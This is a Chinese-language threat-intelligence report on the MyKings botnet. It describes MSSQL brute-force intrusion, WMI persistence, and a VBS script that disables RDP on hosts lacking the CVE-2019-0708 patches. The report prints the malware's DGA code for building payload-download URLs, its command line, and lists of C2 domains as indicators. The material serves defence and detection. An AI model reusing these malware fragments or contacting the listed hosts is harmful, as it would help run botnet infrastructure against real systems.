威胁概述
MyKings,国内大型黑产团伙,于2017年2月左右开始出现,掌握多个子僵尸网络构成的多重僵尸网络,控制肉鸡达百万级,主要通过DDoS攻击和挖矿盈利,通过常规手段入侵后常用Powershell进行驻留,并利用“永恒之蓝”和Mimikatz进行横向扩散,从而构建更大规模的僵尸网络。
近日,奇安信威胁情报中心红雨滴团队监测到MyKings团伙新动态,通过MSSQL爆破入侵服务器后,除了采用DGA域名连线CC服务器下载执行远端命令的机制外,值得注意的是恶意程式码会检测机器是否安装微软5月补丁,如果未安装则会修改设定禁止其他机器通过远端桌面访问。我们根据此举推测,MyKings团伙在获取机器的控制权以后,会试图“加固”系统以阻止其他攻击者通过利用CVE-2019-0708漏洞进入机器,保证自己的对机器的唯一控制权。
值得一提的是,微软远端桌面服务远端程式码执行漏洞CVE-2019-0708,近期已陆陆续续传出在受漏洞影响的系统中稳定利用的视讯和截图,并且自从能导致系统蓝屏的POC出现以来,外网已陆陆续续出现修订版本。可以明确,虽目前还没有公开的RCE Exploit,但从该趋势表明其必将随时出现。
而在漏洞利用出现之日,黑产团伙将会使用早已收集齐全的受漏洞影响的装置清单,批量进行攻击,抓取肉鸡,就像MyKings曾经使用“永恒之蓝”系列漏洞抓取肉鸡的操作一样,那时,将会是一场网络空间灾难。因此,请务必对主机进行补丁更新,防止造成不必要的损失。
详情请看
更新|微软远端桌面服务远端程式码执行漏洞(CVE-2019-0708)预警通告
https://mp.weixin.qq.com/s/QE9lSKF6xVj69zI8jqbX3g
恶意程式码的分析
恶意程式码通过MSSQL爆破进入目标机器,执行regsvr32.exe载入远端指令码:
远端指令码的功能为:利用WMI使一段VBS指令码在机器中持续驻留。
此VBS指令码执行nslookup命令查询C&C域名http://news.g23thr.com的DNS记录,如果http://news.g23thr.com解析的IP地址为xxx.xxx.xxx.120,则访问URL “http://”+chr(xxx)+chr(xxx)+chr(xxx)+”http://xfghh.com/mgxbox.txt”下载第二阶段的Payload执行,URL由IP地址转化为ASCII后拼接得成。目前域名http://news.g23thr.com解析IP为8.8.8.8,此时恶意程式码进入另一流程,尝试通过DGA域名访问。
DGA域名通过当前时间的年、月、日、分钟、秒数值计算得到,算法如下:
u = (hex((year(now())-2000)&Month(now())&(day(now()))&(year(now())-2000)))&"http://fdae.tk"
url = "http://"&minute(now())&second(now())&"."&u&"/mgxbox.txt"
通过该算法我们得到2019年6月、7月、8月的二级域名如下:
2019年6月
2019年7月
2019年8月
http://2fdb3fdae.tk
http://3019bfdae.tk
http://30583fdae.tk
http://2fe17fdae.tk
http://301fffdae.tk
http://305e7fdae.tk
http://2fe7bfdae.tk
http://30263fdae.tk
http://3064bfdae.tk
http://2fedffdae.tk
http://302c7fdae.tk
http://30713fdae.tk
http://2ff43fdae.tk
http://3032bfdae.tk
http://30713fdae.tk
连线通过DGA算法获得的域名拼接而成的URL,返回结果为一段资料:
资料解码后还是一段VBS指令码,这段指令码执行命令获取计算机版本并判断计算机版本是否受CVE-2019-0708漏洞的影响且计算机是否安装特定补丁。如果没有安装补丁,则修改设定禁止其他机器通过远端桌面访问。如下指令码中涉及的KB4499175、KB4500331、KB4499149、KB4499180、KB4499164均为2019年5月微软的更新。
CreateObject("WScript.Shell").Run "cmd /c ver |findstr ""5.0 5.1 5.2 6.0 6.1""&&wmic qfe GET hotfixid |findstr /i ""kb4499175 kb4500331 KB4499149 KB4499180 KB4499164""||wmic RDTOGGLE WHERE ServerName=\'%COMPUTERNAME%\' call SetAllowTSConnections 0",0,False
安全建议
针对MyKings团伙的持续攻击活动,奇安信威胁情报中心建议:
1. 禁止使用弱口令作为密码,使用高强度密码作为唯一口令,且复杂度要求采用大小写字母、数字、特殊符号混合的组合结构,口令位数足够长(15位、两种组合以上)。
2. 奇安信公司的天眼高阶威胁检测系统、天擎终端安全管理系统、态势感知和SOC等系统都支援基于威胁情报的检测和处置,更新系统即可获取最新的防御能力。
IOC
http://news.g23thr.com
http://w.ddff1.tk
http://w.ddff1.tk/g3389.jpg
DGA域名:
2019年6月
http://2fdb3fdae.tk
http://2fe17fdae.tk
http://2fe7bfdae.tk
http://2fedffdae.tk
http://2ff43fdae.tk
2019年7月
http://3019bfdae.tk
http://301fffdae.tk
http://30263fdae.tk
http://302c7fdae.tk
3032bfdae.tk
2019年8月
http://30583fdae.tk
http://305e7fdae.tk
http://3064bfdae.tk
http://306affdae.tk
http://30713fdae.tk
